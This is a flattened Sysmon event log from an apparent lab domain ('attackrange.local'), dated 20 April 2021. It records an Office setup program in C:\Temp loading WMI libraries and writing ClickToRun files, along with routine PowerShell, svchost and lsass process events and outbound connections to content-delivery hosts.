Corporationwbemcomn.dllMD5=EF7A4C64E4A6F52AEAF20828033ADFF8,SHA256=7108BBAE5B91ED6784BD32547F7BD9DEAD392E47ACAB29DC057AEF7CFB746F3C,IMPHASH=3775C2F7CD09C385EEDA8CBB7894E3E3trueMicrosoft WindowsValid 10341000x800000000000000063109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.753{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EAF0-607E-6C0B-00000000BB01}6240C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.753{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EAF0-607E-6C0B-00000000BB01}6240C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000063107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.738{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Windows\SysWOW64\wbem\fastprox.dll10.0.14393.0 (rs1_release.160715-1616)WMI Custom MarshallerMicrosoft® Windows® Operating SystemMicrosoft Corporationfastprox.dllMD5=FBA861EF9AE6F64CA375EEA558D3149B,SHA256=E7DA765AF081635A814E769967702B4711FC64E785EBA9757FFF4590B5C65A4B,IMPHASH=BEC4D2DC6E5428E09C45B14235429DCFtrueMicrosoft WindowsValid 10341000x800000000000000063106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.738{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.738{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.738{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000063103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.738{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ATTACKRANGE\AdministratorC:\Temp\OfficeSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db-journalMD5=471A9689DC6A298550965FCDC5F22EDE,SHA256=0624508199EAC18C359980F92F47CB87AE0AECCEA31EE4281DEA4F52438A5B5C,IMPHASH=00000000000000000000000000000000falsetrue 734700x800000000000000063102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.722{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Windows\SysWOW64\wbem\wbemsvc.dll10.0.14393.0 (rs1_release.160715-1616)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemsvc.dllMD5=75B865AD79ECEA39F566F4EE82B8EC07,SHA256=2C87DCCB0754D5B3A6C27D56E5F2093F987B91607A30F8B80EBCF055E43A47D5,IMPHASH=C49BA5C02FD2B43AF8015BD8DB280C09trueMicrosoft WindowsValid 23542300x800000000000000063101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.738{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ATTACKRANGE\AdministratorC:\Temp\OfficeSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db-journalMD5=ECDA08ED7D284C5BFAF477467028349E,SHA256=86AA5C15722E9D6EFA8D1568599C709273E93EAB447CB0A1D3D0D59F9B326E99,IMPHASH=00000000000000000000000000000000falsetrue 734700x800000000000000063100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.691{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Windows\SysWOW64\wbemcomn.dll10.0.14393.4283 (rs1_release.210303-1802)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemcomn.dllMD5=9B0376830594C27EC739B58531DE2A8F,SHA256=642185F9376946DF0739882DF0063FCE5360FD5B442F65171E69131B306D94D6,IMPHASH=8A8A7EED1F0389DACE5792A5A9D900D5trueMicrosoft WindowsValid 734700x800000000000000063099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.691{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Windows\SysWOW64\wbem\wbemprox.dll10.0.14393.4169 (rs1_release.210107-1130)WMIMicrosoft® Windows® Operating SystemMicrosoft Corporationwbemprox.dllMD5=F14B95C2CD2AC79A48069C95C724EF55,SHA256=9EF2E84DFC50B37D790FA46ABB71AB540D1860B38C8778C092233683FCBDF366,IMPHASH=C93E7CA22B07D6A204D0EDA95C47798DtrueMicrosoft WindowsValid 23542300x800000000000000063098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.628{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ATTACKRANGE\AdministratorC:\Temp\OfficeSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\Office.ValidateResult.scratchMD5=21438EF4B9AD4FC266B6129A2F60DE29,SHA256=13BF7B3039C63BF5A50491FA3CFD8EB4E699D1BA1436315AEF9CBE5711530354,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.628{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ATTACKRANGE\AdministratorC:\Temp\OfficeSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\Office.ValidateError.scratchMD5=BD3457E50947D4280734E74B51B5B68D,SHA256=23D647979BC5DC186DE5BA3E00A222A912AB8E4782EB6407EFA70E29E95979F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.613{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A21AA3BE7CB682FD1075E24D15BA6789,SHA256=271F9057DFE0295E298F0916F9096C00B27485C25403C2253F39D146BDD28AEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.613{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=FF1AFB7D91809AC5864A9C170AC535BB,SHA256=645A4A66AE7AE7C30414CDE04BF969B2873383F8EE7A9AAF39325B96F3CFDC6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.613{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=15D24D6FA665F6FE6218ED8D3E01B8C5,SHA256=725E9ED5CFDA9C234C8C2E4462A3017334C53A35FA7549C36137943D821033EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.316{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_tp01ukwp.33x.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.316{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_uufuu0km.ir0.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.300{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_uufuu0km.ir0.ps12021-04-20 14:53:36.300 23542300x800000000000000063090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.253{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB8B78ABD4CDA26A529D863974BA2338,SHA256=22C93BBD6EDEF23BAACBDF751D8FD7906277A0B0949F2DD917F533E91A45C4A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.113{A7A01FEF-B626-607E-1600-00000000BB01}15402060C:\Windows\system32\svchost.exe{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.113{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.066{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.066{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000063085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-CreatePipe2021-04-20 14:53:36.050{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924\PSHost.132634040159211392.4924.DefaultAppDomain.powershellC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000063084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.035{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gb2jqtdr.xmc.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.035{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5kpzbsig.0qy.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.019{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5kpzbsig.0qy.ps12021-04-20 14:53:36.019 10341000x800000000000000063081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.003{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EAEF-607E-6A0B-00000000BB01}4924C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000049283Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:37.760{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3BFB273F7FF20FE15D16B01B63E019B,SHA256=49139C7DBC027E0851B6703C42E2C4E10F889B65EDAD11EDFC64585F166A0B1B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.988{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppVOrchestration.dll2021-04-20 14:53:37.988 11241100x800000000000000063208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.972{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppVManifest.dll2021-04-20 14:53:37.972 11241100x800000000000000063207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.972{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppVIsvVirtualization.dll2021-04-20 14:53:37.972 354300x800000000000000063206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.007{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57452-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local47001- 354300x800000000000000063205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.007{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57452-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local47001- 354300x800000000000000063204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.979{A7A01FEF-B622-607E-0100-00000000BB01}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57451-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local47001- 354300x800000000000000063203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.979{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57451-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local47001- 354300x800000000000000063202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.915{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57450-false2.16.106.224a2-16-106-224.deploy.static.akamaitechnologies.com80http 354300x800000000000000063201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.908{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local58949- 354300x800000000000000063200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.904{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57449-false104.76.200.56a104-76-200-56.deploy.static.akamaitechnologies.com80http 354300x800000000000000063199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.902{A7A01FEF-B626-607E-1400-00000000BB01}1276C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1-53580-false127.0.0.1-53domain 354300x800000000000000063198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.887{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53580- 354300x800000000000000063197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.887{A7A01FEF-B626-607E-1400-00000000BB01}1276C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98c0:ff87:dce:ffff-53580-true7f00:1:0:0:0:0:0:0-53domain 354300x800000000000000063196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.866{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53580- 354300x800000000000000063195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.825{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57448-false52.109.88.44-443https 354300x800000000000000063194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.810{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local58049- 354300x800000000000000063193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.294{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57447-false10.0.1.12-8000- 11241100x800000000000000063192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.956{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppvIsvSubsystems64.dll2021-04-20 14:53:37.956 11241100x800000000000000063191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.941{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppvIsvSubsystems32.dll2021-04-20 14:53:37.941 11241100x800000000000000063190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.925{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppVIsvSubsystemController.dll2021-04-20 14:53:37.925 11241100x800000000000000063189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.925{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft 